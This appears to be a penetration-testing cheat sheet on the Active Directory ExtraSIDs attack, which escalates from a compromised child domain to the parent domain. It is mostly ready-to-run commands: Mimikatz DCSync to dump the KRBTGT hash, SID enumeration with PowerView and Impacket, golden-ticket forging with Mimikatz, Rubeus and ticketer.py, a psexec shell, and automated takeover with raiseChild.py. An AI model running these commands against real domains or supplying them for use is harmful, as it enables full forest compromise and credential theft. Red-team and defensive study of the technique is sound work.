Child -> Parent Trusts
ExtraSids Attack
An ExtraSIDs attack is a post-exploitation technique where an attacker manipulates a compromised account's Security Identifiers (SIDs) to gain elevated privileges, such as Domain Admin access. This is done by injecting extra SIDs into an access token, often using Mimikatz or similar tools. It exploits how Windows evaluates token privileges, allowing lateral movement and privilege escalation in Active Directory environments.
Using this, we can compromise the parent domain once the child domain has been compromised.
To execute this attack after compromising a child domain, the following information is required:
- The KRBTGT hash of the child domain
- The SID of the child domain
- The name of a target user in the child domain (this user does not need to exist)
- The Fully Qualified Domain Name (FQDN) of the child domain
- The SID of the Enterprise Admins group in the root domain
Windows
Gathering Information
- KRBTGT hash
- SID
Since we already have access to the child domain with Domain Admin privileges, we can use Mimikatz to perform a DCSync attack and retrieve the KRBTGT hash.
mimikatz> lsadump::dcsync /user:DOMAIN\krbtgt
## PowerView
## SID of Domain (Child Domain in our case)
Get-DomainSID
## SID of Group (Enterprise Admins group of root domain in our case)
Get-DomainGroup -Domain REZYDEV.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid
Get-ADGroup -Identity "Enterprise Admins" -Server "REZYDEV.LOCAL" ## LOTL
Creating a Golden Ticket
- mimikatz
- Rubeus
mimikatz.exe
mimikatz> kerberos::golden /user:phpheker /domain:USA.REZYDEV.LOCAL /sid:<SID-OF-CHILD-DOMAIN> /krbtgt:<NTLM-HASH-KRBTGT-USER> /sids:<SID-OF-ENTERPRISE-ADMIN-ROOT-DOMAIN> /ptt
klist # Check if Kerberos ticket for the non-existent 'phpheker' user is in memory
.\Rubeus.exe golden /rc4:<NTLM-HASH-KRBTGT-USER> /domain:USA.REZYDEV.LOCAL /sid:<SID-OF-CHILD-DOMAIN> /sids:<SID-OF-ENTERPRISE-ADMIN-ROOT-DOMAIN> /user:phpheker /ptt
klist # Check if Kerberos ticket for the non-existent 'phpheker' user is in memory
Once a Golden Ticket is created using the Enterprise Admin privileges of the parent domain within the child domain, we can perform a DCSync attack on the parent domain using any available method.
DCSync with Mimikatz
.\mimikatz.exe
lsadump::dcsync /user:REZYDEV\jethalal_adm
## Use /domain:REZYDEV.LOCAL to mention domain principle
Linux
Gathering Information
- secretsdump.py
- SID
python3 /path/to/secretsdump.py usa.rezydev.local/jethalal_adm@10.10.10.50 -just-dc-user USA/krbtgt
We can use lookupsid.py from the Impacket toolkit to perform SID brute-forcing and find the SID of the child domain.
python3 /path/to/lookupsid.py usa.rezydev.local/jethalal_adm@10.10.10.50
This tool will output the Domain SID first, followed by the user RIDs. The user RID is in the format [RID] USERNAME.
To create the SID, we can simply combine DOMAIN_SID-USER_RID to form the SID of a user.
- But we only need SID of the Child Domain.
- Again run same command for
rezydev.localand combineDOMAIN_SID-USER_RIDto form SID of the Enterprise Admins group.
Creating a Golden Ticket
python3 /path/to/ticketer.py -nthash <NTLM-HASH-KRBTGT-USER> -domain USA.REZYDEV.LOCAL -domain-sid <SID-OF-CHILD-DOMAIN> -extra-sid <SID-OF-ENTERPRISE-ADMIN-ROOT-DOMAIN> phpheker
## Above command will create .ccache file to store the golden ticket.
## We need to set 'KRB5CCNAME' environment variable to be able to use it.
export KRB5CCNAME=phpheker.ccache
## Shell using Golden Ticket
python3 /path/to/psexec.py USA.REZYDEV.LOCAL/phpheker@dc01.rezydev.local -k -no-pass -target-ip 10.10.10.10
Automated Attack
Impacket has raiseChild.py, which automates the process of creating a golden ticket and compromising the parent domain through a compromised child domain.
python3 /path/to/raiseChild.py -target-exec 10.10.10.10 USA.REZYDEV.LOCAL/jethalal_adm
## Note: '-target-exec' flag authenticates to the parent domain's DC via Psexec